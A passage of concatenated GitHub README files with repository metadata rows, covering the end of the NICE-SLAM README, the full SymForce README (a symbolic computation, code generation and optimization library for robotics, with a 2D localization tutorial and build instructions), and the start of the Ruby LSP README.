As discussed in many recent papers, e.g. UNISURF/VolSDF/NeuS, manual thresholding the volume density during marching cubes might be needed. Moreover, we find out there exist scaling differences, possibly because of the reason discussed in [NeuS](https://arxiv.org/abs/2106.10689). Therefore, ICP with scale is needed. You can use the [ICP tool](https://www.cloudcompare.org/doc/wiki/index.php?title=ICP) in [CloudCompare](https://www.danielgm.net/cc/) with default configuration with scaling enabled.
</details>
## Acknowledgement
We adapted some codes from some awesome repositories including [convolutional_occupancy_networks](https://github.com/autonomousvision/convolutional_occupancy_networks), [nerf-pytorch](https://github.com/yenchenlin/nerf-pytorch), [lietorch](https://github.com/princeton-vl/lietorch), and [DIST-Renderer](https://github.com/B1ueber2y/DIST-Renderer). Thanks for making codes public available. We also thank [Edgar Sucar](https://edgarsucar.github.io/) for allowing us to make the Replica Dataset available.
## Citation
If you find our code or paper useful, please cite
```bibtex
@inproceedings{Zhu2022CVPR,
author = {Zhu, Zihan and Peng, Songyou and Larsson, Viktor and Xu, Weiwei and Bao, Hujun and Cui, Zhaopeng and Oswald, Martin R. and Pollefeys, Marc},
title = {NICE-SLAM: Neural Implicit Scalable Encoding for SLAM},
booktitle = {Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR)},
year = {2022}
}
```
## Contact
Contact [Zihan Zhu](mailto:zhuzihan2000@gmail.com) and [Songyou Peng](mailto:songyou.pp@gmail.com) for questions, comments and reporting bugs.
| [CVPR'22] NICE-SLAM: Neural Implicit Scalable Encoding for SLAM | slam,neural-fields,neural-implicit-representations,scalable,implicit-functions,localization,deep-learning,3d-reconstruction | 0 | 11 | 2 | 5 | 0 | 1 | 0 |
symforce-org/symforce | <!-- There's no good way to make an image that's different on light/dark mode that also links
somewhere. The closest thing is to add a #gh-light-mode-only to the target, which does this,
but is kinda confusing -->
![SymForce](docs/static/images/symforce_banner.png#gh-light-mode-only)
<!-- DARK_MODE_ONLY -->
![SymForce](docs/static/images/symforce_banner_dark.png#gh-dark-mode-only)
<!-- /DARK_MODE_ONLY -->
<p align="center">
<a href="https://github.com/symforce-org/symforce/actions/workflows/ci.yml?query=branch%3Amain"><img alt="CI status" src="https://github.com/symforce-org/symforce/actions/workflows/ci.yml/badge.svg" /></a>
<a href="https://symforce.org"><img alt="Documentation" src="https://img.shields.io/badge/api-docs-blue" /></a>
<a href="https://github.com/symforce-org/symforce"><img alt="Source Code" src="https://img.shields.io/badge/source-code-blue" /></a>
<a href="https://github.com/symforce-org/symforce/issues"><img alt="Issues" src="https://img.shields.io/badge/issue-tracker-blue" /></a>
<img alt="Python 3.8 | 3.9 | 3.10 | 3.11 | 3.12" src="https://img.shields.io/pypi/pyversions/symforce" />
<img alt="C++14" src="https://img.shields.io/badge/c++-14-blue" />
<a href="https://pypi.org/project/symforce/"><img alt="PyPI" src="https://img.shields.io/pypi/v/symforce" /></a>
<a href="https://github.com/symforce-org/symforce/tree/main/LICENSE"><img alt="Apache License" src="https://img.shields.io/pypi/l/symforce" /></a>
</p>
---
SymForce is a fast symbolic computation and code generation library for robotics applications like computer vision, state estimation, motion planning, and controls. It combines the development speed and flexibility of symbolic mathematics with the performance of autogenerated, highly optimized code in C++ or any target runtime language. SymForce contains three independently useful systems:
+ **Symbolic Toolkit** - builds on the SymPy API to provide rigorous geometric and camera types, lie group calculus, singularity handling, and tools to model complex problems
+ **Code Generator** - transforms symbolic expressions into blazing-fast, branchless code with clean APIs and minimal dependencies, with a template system to target any language
+ **Optimization Library** - a fast tangent-space optimization library based on factor graphs, with a highly optimized implementation for real-time robotics applications
SymForce automatically computes tangent space Jacobians, eliminating the need for any bug-prone handwritten derivatives. Generated functions can be directly used as factors in our nonlinear optimizer. This workflow enables faster runtime functions, faster development time, and fewer lines of handwritten code versus alternative methods.
SymForce is developed and maintained by [Skydio](https://skydio.com/). It is used in production to accelerate tasks like SLAM, bundle adjustment, calibration, and sparse nonlinear MPC for autonomous robots at scale.
<br/>
<img alt="SymForce" src="docs/static/images/symforce_diagram.png" width="700px"/>
<br/>
#### Features
+ Symbolic implementations of geometry and camera types with Lie group operations
+ Code generation of fast native runtime code from symbolic expressions, reducing duplication and minimizing bugs
+ Novel tools to compute fast and correct tangent-space jacobians for any expression, avoiding all handwritten derivatives
+ Strategies for flattening computation and leveraging sparsity that can yield 10x speedups over standard autodiff
+ A fast tangent-space optimization library in C++ and Python based on factor graphs
+ Rapid prototyping and analysis of complex problems with symbolic math, with a seamless workflow into production use
+ Embedded-friendly C++ generation of templated Eigen code with zero dynamic memory allocation
+ Highly performant, modular, tested, and extensible code
### Read the paper: <a href="https://arxiv.org/abs/2204.07889">https://arxiv.org/abs/2204.07889</a>
### And watch the video: <a href="https://youtu.be/QO_ltJRNj0o">https://youtu.be/QO_ltJRNj0o</a>
SymForce was published to [RSS 2022](https://roboticsconference.org/). Please cite it as follows:
```
@inproceedings{Martiros-RSS-22,
author = {Hayk Martiros AND Aaron Miller AND Nathan Bucki AND Bradley Solliday AND Ryan Kennedy AND Jack Zhu AND Tung Dang AND Dominic Pattison AND Harrison Zheng AND Teo Tomic AND Peter Henry AND Gareth Cross AND Josiah VanderMey AND Alvin Sun AND Samuel Wang AND Kristen Holtz},
title = {{SymForce: Symbolic Computation and Code Generation for Robotics}},
booktitle = {Proceedings of Robotics: Science and Systems},
year = {2022},
doi = {10.15607/RSS.2022.XVIII.041}
}
```
# Install
Install with pip:
```bash
pip install symforce
```
Verify the installation in Python:
```python
>>> import symforce.symbolic as sf
>>> sf.Rot3()
```
This installs pre-compiled C++ components of SymForce on Linux and Mac using pip wheels, but does not include C++ headers. If you want to compile against C++ SymForce types (like `sym::Optimizer`), you currently need to <a href="#build-from-source">build from source</a>.
# Tutorial
Let's walk through a simple example of modeling and solving an optimization problem with SymForce. In this example a robot moves through a 2D plane and the goal is to estimate its pose at multiple time steps given noisy measurements.
The robot measures:
* the distance it traveled from an odometry sensor
* relative bearing angles to known landmarks in the scene
The robot's heading angle is defined counter-clockwise from the x-axis, and its relative bearing measurements are defined from the robot's forward direction:
<img alt="Robot 2D Localization Figure" src="docs/static/images/robot_2d_localization/problem_setup.png" width="350px"/>
## Explore the math
Import the SymForce symbolic API, which contains the augmented SymPy API, as well as geometry and camera types:
```python
import symforce.symbolic as sf
```
Create a symbolic 2D pose and landmark location. Using symbolic variables lets us explore and build up the math in a pure form.
```python
pose = sf.Pose2(
t=sf.V2.symbolic("t"),
R=sf.Rot2.symbolic("R")
)
landmark = sf.V2.symbolic("L")
```
Let's transform the landmark into the local frame of the robot. We choose to represent poses as
`world_T_body`, meaning that to take a landmark in the world frame and get its position in the body
frame, we do:
```python
landmark_body = pose.inverse() * landmark
```
$$
\begin{bmatrix}
R_{re} L_0 + R_{im} L_1 - R_{im} t_1 - R_{re} t_0 \\
-R_{im} L_0 + R_{re} L_1 + R_{im} t_0 + R_{re} t_1
\end{bmatrix}
$$
You can see that `sf.Rot2` is represented internally by a complex number (𝑅𝑟𝑒, 𝑅𝑖𝑚) and we can study how it rotates the landmark 𝐿.
For exploration purposes, let's take the jacobian of the body-frame landmark with respect to the tangent space of the `Pose2`, parameterized as (𝜃, 𝑥, 𝑦):
```python
landmark_body.jacobian(pose)
```
$$
\begin{bmatrix}
-L_0 R_{im} + L_1 R_{re} + t_0 R_{im} - t_1 R_{re}, & -R_{re}, & -R_{im} \\
-L_0 R_{re} - L_1 R_{im} + t_0 R_{re} + t_1 R_{im}, & R_{im}, & -R_{re}
\end{bmatrix}
$$
Note that even though the orientation is stored as a complex number, the tangent space is a scalar angle and SymForce understands that.
Now compute the relative bearing angle:
```python
sf.atan2(landmark_body[1], landmark_body[0])
```
$$
atan_2(-R_{im} L_0 + R_{re} L_1 + R_{im} t_0 + R_{re} t_1, R_{re} L_0 + R_{im} L_1 - R_{im} t_1 - R_{re} t_0)
$$
One important note is that `atan2` is singular at (0, 0). In SymForce we handle this by placing a symbol ϵ (epsilon) that preserves the value of an expression in the limit of ϵ → 0, but allows evaluating at runtime with a very small nonzero value. Functions with singularities accept an `epsilon` argument:
```python
sf.V3.symbolic("x").norm(epsilon=sf.epsilon())
```
$$
\sqrt{x_0^2 + x_1^2 + x_2^2 + \epsilon}
$$
See the [Epsilon Tutorial](https://symforce.org/tutorials/epsilon_tutorial.html) in the SymForce Docs for more information.
## Build an optimization problem
We will model this problem as a factor graph and solve it with nonlinear least-squares.
First, we need to tell SymForce to use a nonzero epsilon to prevent singularities. This isn't necessary when playing around with symbolic expressions like we were above, but it's important now that we want to numerically evaluate some results. For more information, check out the [Epsilon Tutorial](https://symforce.org/tutorials/epsilon_tutorial.html) - for now, all you need to do is this:
```python
import symforce
symforce.set_epsilon_to_symbol()
```
This needs to be done before other parts of symforce are imported - if you're following along in a
notebook you should add this at the top and restart the kernel.
Now that epsilon is set up, we will instantiate numerical [`Values`](https://symforce.org/api/symforce.values.values.html?highlight=values#module-symforce.values.values) for the problem, including an initial guess for our unknown poses (just set them to identity).
```python
import numpy as np
from symforce.values import Values
num_poses = 3
num_landmarks = 3
initial_values = Values(
poses=[sf.Pose2.identity()] * num_poses,
landmarks=[sf.V2(-2, 2), sf.V2(1, -3), sf.V2(5, 2)],
distances=[1.7, 1.4],
angles=np.deg2rad([[145, 335, 55], [185, 310, 70], [215, 310, 70]]).tolist(),
epsilon=sf.numeric_epsilon,
)
```
Next, we can set up the factors connecting our variables. The residual function comprises of two terms - one for the bearing measurements and one for the odometry measurements. Let's formalize the math we just defined for the bearing measurements into a symbolic residual function:
```python
def bearing_residual(
pose: sf.Pose2, landmark: sf.V2, angle: sf.Scalar, epsilon: sf.Scalar
) -> sf.V1:
t_body = pose.inverse() * landmark
predicted_angle = sf.atan2(t_body[1], t_body[0], epsilon=epsilon)
return sf.V1(sf.wrap_angle(predicted_angle - angle))
```
This function takes in a pose and landmark variable and returns the error between the predicted bearing angle and a measured value. Note that we call `sf.wrap_angle` on the angle difference to prevent wraparound effects.
The residual for distance traveled is even simpler:
```python
def odometry_residual(
pose_a: sf.Pose2, pose_b: sf.Pose2, dist: sf.Scalar, epsilon: sf.Scalar
) -> sf.V1:
return sf.V1((pose_b.t - pose_a.t).norm(epsilon=epsilon) - dist)
```
Now we can create [`Factor`](https://symforce.org/api/symforce.opt.factor.html?highlight=factor#module-symforce.opt.factor) objects from the residual functions and a set of keys. The keys are named strings for the function arguments, which will be accessed by name from a [`Values`](https://symforce.org/api/symforce.values.values.html) class we later instantiate with numerical quantities.
```python
from symforce.opt.factor import Factor
factors = []
# Bearing factors
for i in range(num_poses):
for j in range(num_landmarks):
factors.append(Factor(
residual=bearing_residual,
keys=[f"poses[{i}]", f"landmarks[{j}]", f"angles[{i}][{j}]", "epsilon"],
))
# Odometry factors
for i in range(num_poses - 1):
factors.append(Factor(
residual=odometry_residual,
keys=[f"poses[{i}]", f"poses[{i + 1}]", f"distances[{i}]", "epsilon"],
))
```
Here is a visualization of the structure of this factor graph:
<img alt="Robot 2D Localization Factor Graph" src="docs/static/images/robot_2d_localization/factor_graph.png" width="600px"/>
## Solve the problem
Our goal is to find poses of the robot that minimize the residual of this factor graph, assuming the
landmark positions in the world are known. We create an
[`Optimizer`](https://symforce.org/api/symforce.opt.optimizer.html?highlight=optimizer#module-symforce.opt.optimizer)
with these factors and tell it to only optimize the pose keys (the rest are held constant):
```python
from symforce.opt.optimizer import Optimizer
optimizer = Optimizer(
factors=factors,
optimized_keys=[f"poses[{i}]" for i in range(num_poses)],
# So that we save more information about each iteration, to visualize later:
debug_stats=True,
)
```
Now run the optimization! This returns an [`Optimizer.Result`](https://symforce.org/api/symforce.opt.optimizer.html?highlight=optimizer#symforce.opt.optimizer.Optimizer.Result) object that contains the optimized values, error statistics, and per-iteration debug stats (if enabled).
```python
result = optimizer.optimize(initial_values)
```
We can check that the optimization succeeded, and look at the final error:
```python
assert result.status == Optimizer.Status.SUCCESS
print(result.error())
```
Let's visualize what the optimizer did. The orange circles represent the fixed landmarks, the blue
circles represent the robot, and the dotted lines represent the bearing measurements.
```python
from symforce.examples.robot_2d_localization.plotting import plot_solution
plot_solution(optimizer, result)
```
<img alt="Robot 2D Localization Solution" src="docs/static/images/robot_2d_localization/iterations.gif" width="600px"/>
All of the code for this example can also be found in `symforce/examples/robot_2d_localization`.
## Symbolic vs Numerical Types
SymForce provides `sym` packages with runtime code for geometry and camera types that are generated from its symbolic `geo` and `cam` packages. As such, there are multiple versions of a class like `Pose3` and it can be a common source of confusion.
The canonical symbolic class [`sf.Pose3`](https://symforce.org/api/symforce.symbolic.html#symforce.symbolic.Pose3) lives in the `symforce` package:
```python
sf.Pose3.identity()
```
The autogenerated Python runtime class [`sym.Pose3`](https://symforce.org/api-gen-py/sym.pose3.html?highlight=pose3#module-sym.pose3) lives in the `sym` package:
```python
import sym
sym.Pose3.identity()
```
The autogenerated C++ runtime class [`sym::Pose3`](https://symforce.org/api-gen-cpp/class/classsym_1_1Pose3.html) lives in the `sym::` namespace:
```C++
sym::Pose3<double>::Identity()
```
The matrix type for symbolic code is [`sf.Matrix`](https://symforce.org/api/symforce.symbolic.html#symforce.symbolic.Matrix), for generated Python is [`numpy.ndarray`](https://numpy.org/doc/stable/reference/generated/numpy.ndarray.html), and for C++ is [`Eigen::Matrix`](https://eigen.tuxfamily.org/dox/group__TutorialMatrixClass.html).
The symbolic classes can also handle numerical values, but will be dramatically slower than the generated classes. The symbolic classes must be used when defining functions for codegen and optimization. Generated functions always accept the runtime types.
The `Codegen` or `Factor` objects require symbolic types and functions to do math and generate code. However, once code is generated, numerical types should be used when invoking generated functions and in the initial values when calling the `Optimizer`.
As a convenience, the Python `Optimizer` class can accept symbolic types in its `Values` and convert to numerical types before invoking generated functions. This is done in the tutorial example for simplicity.
## Generate runtime C++ code
Let's look under the hood to understand how that optimization worked. For each factor, SymForce introspects the form of the symbolic function, passes through symbolic inputs to build an output expression, automatically computes tangent-space jacobians of those output expressions w.r.t. the optimized variables, and generates fast runtime code for them.
The [`Codegen`](https://symforce.org/api/symforce.codegen.codegen.html?highlight=codegen#module-symforce.codegen.codegen) class is the central tool for generating runtime code from symbolic expressions. In this case, we pass it the bearing residual function and configure it to generate C++ code:
```python
from symforce.codegen import Codegen, CppConfig
codegen = Codegen.function(bearing_residual, config=CppConfig())
```
We can then create another `Codegen` object that computes a Gauss-Newton linearization from this Codegen object. It does this by introspecting and symbolically differentiating the given arguments:
```python
codegen_linearization = codegen.with_linearization(
which_args=["pose"]
)
```
Generate a C++ function that computes the linearization wrt the pose argument:
```python
metadata = codegen_linearization.generate_function()
print(open(metadata.generated_files[0]).read())
```
This C++ code depends only on Eigen and computes the results in a single flat function that shares all common sub-expressions:
```c++
#pragma once
#include <Eigen/Core>
#include <sym/pose2.h>
namespace sym {
/**
* This function was autogenerated from a symbolic function. Do not modify by hand.
*
* Symbolic function: bearing_residual
*
* Args:
* pose: Pose2
* landmark: Matrix21
* angle: Scalar
* epsilon: Scalar
*
* Outputs:
* res: Matrix11
* jacobian: (1x3) jacobian of res wrt arg pose (3)
* hessian: (3x3) Gauss-Newton hessian for arg pose (3)
* rhs: (3x1) Gauss-Newton rhs for arg pose (3)
*/
template <typename Scalar>
void BearingFactor(const sym::Pose2<Scalar>& pose, const Eigen::Matrix<Scalar, 2, 1>& landmark,
const Scalar angle, const Scalar epsilon,
Eigen::Matrix<Scalar, 1, 1>* const res = nullptr,
Eigen::Matrix<Scalar, 1, 3>* const jacobian = nullptr,
Eigen::Matrix<Scalar, 3, 3>* const hessian = nullptr,
Eigen::Matrix<Scalar, 3, 1>* const rhs = nullptr) {
// Total ops: 66
// Input arrays
const Eigen::Matrix<Scalar, 4, 1>& _pose = pose.Data();
// Intermediate terms (24)
const Scalar _tmp0 = _pose[1] * _pose[2];
const Scalar _tmp1 = _pose[0] * _pose[3];
const Scalar _tmp2 = _pose[0] * landmark(1, 0) - _pose[1] * landmark(0, 0);
const Scalar _tmp3 = _tmp0 - _tmp1 + _tmp2;
const Scalar _tmp4 = _pose[0] * _pose[2] + _pose[1] * _pose[3];
const Scalar _tmp5 = _pose[1] * landmark(1, 0);
const Scalar _tmp6 = _pose[0] * landmark(0, 0);
const Scalar _tmp7 = -_tmp4 + _tmp5 + _tmp6;
const Scalar _tmp8 = _tmp7 + epsilon * ((((_tmp7) > 0) - ((_tmp7) < 0)) + Scalar(0.5));
const Scalar _tmp9 = -angle + std::atan2(_tmp3, _tmp8);
const Scalar _tmp10 =
_tmp9 - 2 * Scalar(M_PI) *
std::floor((Scalar(1) / Scalar(2)) * (_tmp9 + Scalar(M_PI)) / Scalar(M_PI));
const Scalar _tmp11 = Scalar(1.0) / (_tmp8);
const Scalar _tmp12 = std::pow(_tmp8, Scalar(2));
const Scalar _tmp13 = _tmp3 / _tmp12;
const Scalar _tmp14 = _tmp11 * (_tmp4 - _tmp5 - _tmp6) - _tmp13 * (_tmp0 - _tmp1 + _tmp2);
const Scalar _tmp15 = _tmp12 + std::pow(_tmp3, Scalar(2));
const Scalar _tmp16 = _tmp12 / _tmp15;
const Scalar _tmp17 = _tmp14 * _tmp16;
const Scalar _tmp18 = _pose[0] * _tmp13 + _pose[1] * _tmp11;
const Scalar _tmp19 = _tmp16 * _tmp18;
const Scalar _tmp20 = -_pose[0] * _tmp11 + _pose[1] * _tmp13;
const Scalar _tmp21 = _tmp16 * _tmp20;
const Scalar _tmp22 = std::pow(_tmp8, Scalar(4)) / std::pow(_tmp15, Scalar(2));
const Scalar _tmp23 = _tmp18 * _tmp22;
// Output terms (4)
if (res != nullptr) {
Eigen::Matrix<Scalar, 1, 1>& _res = (*res);
_res(0, 0) = _tmp10;
}
if (jacobian != nullptr) {
Eigen::Matrix<Scalar, 1, 3>& _jacobian = (*jacobian);
_jacobian(0, 0) = _tmp17;
_jacobian(0, 1) = _tmp19;
_jacobian(0, 2) = _tmp21;
}
if (hessian != nullptr) {
Eigen::Matrix<Scalar, 3, 3>& _hessian = (*hessian);
_hessian(0, 0) = std::pow(_tmp14, Scalar(2)) * _tmp22;
_hessian(0, 1) = 0;
_hessian(0, 2) = 0;
_hessian(1, 0) = _tmp14 * _tmp23;
_hessian(1, 1) = std::pow(_tmp18, Scalar(2)) * _tmp22;
_hessian(1, 2) = 0;
_hessian(2, 0) = _tmp14 * _tmp20 * _tmp22;
_hessian(2, 1) = _tmp20 * _tmp23;
_hessian(2, 2) = std::pow(_tmp20, Scalar(2)) * _tmp22;
}
if (rhs != nullptr) {
Eigen::Matrix<Scalar, 3, 1>& _rhs = (*rhs);
_rhs(0, 0) = _tmp10 * _tmp17;
_rhs(1, 0) = _tmp10 * _tmp19;
_rhs(2, 0) = _tmp10 * _tmp21;
}
}
} // namespace sym
```
SymForce can also generate runtime Python code that depends only on `numpy`.
The code generation system is written with pluggable [jinja](https://palletsprojects.com/p/jinja/) templates to minimize the work to add new backend languages. Some of our top candidates to add are TypeScript, CUDA, and PyTorch.
## Optimize from C++
Now that we can generate C++ functions for each residual function, we can also run the optimization purely from C++ to get Python entirely out of the loop for production use.
```c++
const int num_poses = 3;
const int num_landmarks = 3;
std::vector<sym::Factor<double>> factors;
// Bearing factors
for (int i = 0; i < num_poses; ++i) {
for (int j = 0; j < num_landmarks; ++j) {
factors.push_back(sym::Factor<double>::Hessian(
sym::BearingFactor<double>,
{{'P', i}, {'L', j}, {'a', i, j}, {'e'}}, // keys
{{'P', i}} // keys to optimize
));
}
}
// Odometry factors
for (int i = 0; i < num_poses - 1; ++i) {
factors.push_back(sym::Factor<double>::Hessian(
sym::OdometryFactor<double>,
{{'P', i}, {'P', i + 1}, {'d', i}, {'e'}}, // keys
{{'P', i}, {'P', i + 1}} // keys to optimize
));
}
const auto params = sym::DefaultOptimizerParams();
sym::Optimizer<double> optimizer(
params,
factors,
sym::kDefaultEpsilon<double>
);
sym::Values<double> values;
for (int i = 0; i < num_poses; ++i) {
values.Set({'P', i}, sym::Pose2d::Identity());
}
// Set additional values
values.Set({'L', 0}, Eigen::Vector2d(-2, 2));
values.Set({'L', 1}, Eigen::Vector2d(1, -3));
values.Set({'L', 2}, Eigen::Vector2d(5, 2));
values.Set({'d', 0}, 1.7);
values.Set({'d', 1}, 1.4);
const std::array<std::array<double, 3>, 3> angles = {
{{55, 245, -35}, {95, 220, -20}, {125, 220, -20}}
};
for (int i = 0; i < angles.size(); ++i) {
for (int j = 0; j < angles[0].size(); ++j) {
values.Set({'a', i, j}, angles[i][j] * M_PI / 180);
}
}
values.Set('e', sym::kDefaultEpsilond);
// Optimize!
const auto stats = optimizer.Optimize(values);
std::cout << "Exit status: " << stats.status << std::endl;
std::cout << "Optimized values:" << values << std::endl;
```
This tutorial shows the central workflow in SymForce for creating symbolic expressions, generating code, and optimizing. This approach works well for a wide range of complex problems in robotics, computer vision, and applied science.
However, each piece may also be used independently. The optimization machinery can work with handwritten functions, and the symbolic math and code generation is useful outside of any optimization context.
<!-- $
<span style="color:blue">TODO: I wanted to show `sf.V1(sm.atan2(landmark_body[1], landmark_body[0])).jacobian(pose.R)`, but you have to call `sm.simplify` to get the expression to -1, otherwise it's more complicated. All this is also showing up extraneously in the generated code. Discuss what to show.</span>
\frac{
(-\frac{
(-R_{im} L_0 + R_{re} L_1 + R_{im} t_0 + R_{re} t_1)^2
}{
(R_{re} L_0 + R_{im} L_1 - R_{im} t_1 - R_{re} t_0)^2
} + \frac{
}{
})(R_{re} L_0 + R_{im} L_1 - R_{im} t_1 - R_{re} t_0)^2
}{
(-R_{im} L_0 + R_{re} L_1 + R_{im} t_0 + R_{re} t_1)^2 +
(R_{re} L_0 + R_{im} L_1 - R_{im} t_1 - R_{re} t_0)^2
}
$ -->
To learn more, visit the SymForce tutorials [here](https://symforce.org/#guides).
# Build from Source
For best results, you should build from the [latest tagged release](https://github.com/symforce-org/symforce/releases/latest). You can also build from `main`, or from another branch, but everything is less guaranteed to work.
SymForce requires Python 3.8 or later. The build is currently tested on Linux and macOS, SymForce on Windows is untested (see [#145](https://github.com/symforce-org/symforce/issues/145)). We strongly suggest creating a virtual python environment.
Install the `gmp` package with one of:
```bash
apt install libgmp-dev # Ubuntu
brew install gmp # Mac
conda install -c conda-forge gmp # Conda
```
SymForce contains both C++ and Python code. The C++ code is built using CMake. You can build the package either by calling pip, or by calling CMake directly. If building with `pip`, this will call CMake under the hood, and run the same CMake build for the C++ components.
If you encounter build issues, please file an [issue](https://github.com/symforce-org/symforce/issues).
## Build with pip
If you just want to build and install SymForce without repeatedly modifying the source, the recommended way to do this is with pip. From the symforce directory:
```bash
pip install .
```
If you're modifying the SymForce Python sources, you can do an [editable install](https://pip.pypa.io/en/stable/topics/local-project-installs/#editable-installs) instead. This will let you modify the Python components of SymForce without reinstalling. If you're going to repeatedly modify the C++ sources, you should instead build with CMake directly as described <a href="#build-with-cmake">below</a>. From the symforce directory:
```bash
pip install -e .
```
You should then [verify your installation](#verify-your-installation).
___Note:___ `pip install .` will not install pinned versions of SymForce's dependencies, it'll install any compatible versions. It also won't install all packages required to run all of the SymForce tests and build all of the targets (e.g. building the docs or running the linters). If you want all packages required for that, you should `pip install .[dev]` instead (or one of the other groups of extra requirements in our `setup.py`). If you additionally want pinned versions of our dependencies, which are the exact versions guaranteed by CI to pass all of our tests, you can install them from `pip install -r dev_requirements.txt`.
_Note: Editable installs as root with the system python on Ubuntu (and other Debian derivatives) are broken on `setuptools<64.0.0`. This is a [bug in Debian](https://ffy00.github.io/blog/02-python-debian-and-the-install-locations/), not something in SymForce that we can fix. If this is your situation, either use a virtual environment, upgrade setuptools to a version `>=64.0.0`, or use a different installation method._
## Build with CMake
If you'll be modifying the C++ parts of SymForce, you should build with CMake directly instead - this method will not install
SymForce into your Python environment, so you'll need to add it to your PYTHONPATH separately.
Install python requirements:
```bash
pip install -r dev_requirements.txt
```
Build SymForce (requires C++14 or later):
```bash
mkdir build
cd build
cmake ..
make -j $(nproc)
```
You'll then need to add SymForce (along with `gen/python` and `third_party/skymarshal` within symforce and `lcmtypes/python2.7` within the build directory) to your PYTHONPATH in order to use them, for example:
```bash
export PYTHONPATH="$PYTHONPATH:/path/to/symforce:/path/to/symforce/build/lcmtypes/python2.7"
```
If you want to install SymForce to use its C++ libraries in another CMake project, you can do that with:
```bash
make install
```
SymForce does not currently integrate with CMake's `find_package` (see [#209](https://github.com/symforce-org/symforce/issues/209)), so if you do this you currently need to add its libraries as link dependencies in your CMake project manually.
## Verify your installation
```python
>>> import symforce
>>> symforce.get_symbolic_api()
'symengine'
>>> from symforce import cc_sym
```
If you see `'sympy'` here instead of `'symengine'`, or can't import `cc_sym`, your installation is probably broken and you should submit an [issue](https://github.com/symforce-org/symforce/issues).
# License
SymForce is released under the [Apache 2.0](https://spdx.org/licenses/Apache-2.0.html) license.
See the [LICENSE](https://github.com/symforce-org/symforce/blob/main/LICENSE) file for more information.
# Sponsors
SymForce is developed and maintained by [Skydio](https://skydio.com/). It is released as a free and open-source library for the robotics community.
<a href="http://skydio.com#gh-light-mode-only">
<img alt="Skydio Logo" src="docs/static/images/skydio-logo-2.png" width="300px" />
</a>
<!-- DARK_MODE_ONLY -->
<a href="http://skydio.com#gh-dark-mode-only">
<img alt="Skydio Logo" src="docs/static/images/skydio-logo-2-white.png" width="300px" />
</a>
<!-- /DARK_MODE_ONLY -->
# Contributing
While SymForce already powers tens of thousands of robots at Skydio, the public library is new and we are releasing it in beta stage. This is just the beginning, and we are excited for engagement from the community. Thank you for helping us develop SymForce! The best way to get started is to file [issues](https://github.com/symforce-org/symforce/issues) for bugs or desired features.
There are many features we're excited to add to SymForce and would love to see contributed by the community. Most are outlined in the issues, but some major desired contributions are:
- Add more backend languages, such as TypeScript and GLSL/HLSL, and improvements to the experimental CUDA and PyTorch backends
- Support for WebAssembly compilation
- More Lie group types, in particular Sim(3)
- Support for constraints in our optimizer
- Integration with [ISPC](https://ispc.github.io/)
- Windows and conda packages
| Fast symbolic computation, code generation, and nonlinear optimization for robotics | robotics,python,cpp,code-generation,optimization,symbolic-computation,slam,computer-vision,motion-planning,structure-from-motion | 7 | 67 | 122 | 992 | 128 | 18 | 4 |
Shopify/ruby-lsp | <p align="center">
<img alt="Ruby LSP logo" width="200" src="vscode/icon.png" />
</p>
[![Build Status](https://github.com/Shopify/ruby-lsp/workflows/CI/badge.svg)](https://github.com/Shopify/ruby-lsp/actions/workflows/ci.yml)
[![Ruby LSP extension](https://img.shields.io/badge/VS%20Code-Ruby%20LSP-success?logo=visual-studio-code)](https://marketplace.visualstudio.com/items?itemName=Shopify.ruby-lsp)
[![Ruby DX Slack](https://img.shields.io/badge/Slack-Ruby%20DX-success?logo=slack)](https://join.slack.com/t/ruby-dx/shared_invite/zt-2c8zjlir6-uUDJl8oIwcen_FS_aA~b6Q)
# Ruby LSP
The Ruby LSP is an implementation of the [language server protocol](https://microsoft.github.io/language-server-protocol/)
for Ruby, used to improve rich features in editors. It is a part of a wider goal to provide a state-of-the-art
experience to Ruby developers using modern standards for cross-editor features, documentation and debugging.
Want to discuss Ruby developer experience? Consider joining the public
[Ruby DX Slack workspace](https://join.slack.com/t/ruby-dx/shared_invite/zt-2c8zjlir6-uUDJl8oIwcen_FS_aA~b6Q).
## Features
![Ruby LSP demo](vscode/extras/ruby_lsp_demo.gif)
The Ruby LSP features include
- Semantic highlighting
- Symbol search and code outline
- RuboCop errors and warnings (diagnostics)
- Format on save (with RuboCop or Syntax Tree)
- Format on type
- Debugging support
- Running and debugging tests through VS Code's UI
- Go to definition for classes, modules, constants and required files
- Showing documentation on hover for classes, modules and constants
- Completion for classes, modules, constants and require paths
- Fuzzy search classes, modules and constants anywhere in the project and its dependencies (workspace symbol)
Adding method support for definition, completion, hover and workspace symbol is partially supported, but not yet complete. Follow progress in https://github.com/Shopify/ruby-lsp/issues/899
See complete information about features [here](https://shopify.github.io/ruby-lsp/RubyLsp/Requests.html).
If you experience issues, please see the [troubleshooting
guide](https://github.com/Shopify/ruby-lsp/blob/main/TROUBLESHOOTING.md).
## Usage
### With VS Code
If using VS Code, all you have to do is install the [Ruby LSP
extension](https://marketplace.visualstudio.com/items?itemName=Shopify.ruby-lsp) to get the extra features in the
editor. Do not install the `ruby-lsp` gem manually.
For more information on using and configuring the extension, see [vscode/README.md](vscode/README.md).
### With other editors
See [editors](EDITORS.md) for community instructions on setting up the Ruby LSP, which current includes Emacs, Neovim, Sublime Text, and Zed.
The gem can be installed by doing
```shell
gem install ruby-lsp
```
and the language server can be launched running `ruby-lsp` (without bundle exec in order to properly hook into your
project's dependencies).
### Documentation
See the [documentation](https://shopify.github.io/ruby-lsp) for more in-depth details about the
[supported features](https://shopify.github.io/ruby-lsp/RubyLsp/Requests.html).
For creating rich themes for Ruby using the semantic highlighting information, see the [semantic highlighting
documentation](SEMANTIC_HIGHLIGHTING.md).
### Configuring code indexing
By default, the Ruby LSP indexes all Ruby files defined in the current project and all of its dependencies, including
default gems, except for
- Gems that only appear under the `:development` group
- All Ruby files under `test/**/*.rb`
By creating a `.index.yml` file, these configurations can be overridden and tuned. Note that indexing dependent behavior, such as definition, hover, completion or workspace symbol will be impacted by the configurations placed here.
```yaml
# Exclude files based on a given pattern. Often used to exclude test files or fixtures
excluded_patterns:
- "**/spec/**/*.rb"
# Include files based on a given pattern. Can be used to index Ruby files that use different extensions
included_patterns:
- "**/bin/*"
# Exclude gems by name. If a gem is never referenced in the project's code and is only used as a tool, excluding it will
# speed up indexing and reduce the amount of results in features like definition or completion
excluded_gems:
- rubocop
- pathname
# Include gems by name. Normally used to include development gems that are excluded by default
included_gems:
- prism
```
### Addons
The Ruby LSP provides an addon system that allows other gems to enhance the base functionality with more editor
features. This is the mechanism that powers addons like
- [Ruby LSP Rails](https://github.com/Shopify/ruby-lsp-rails)
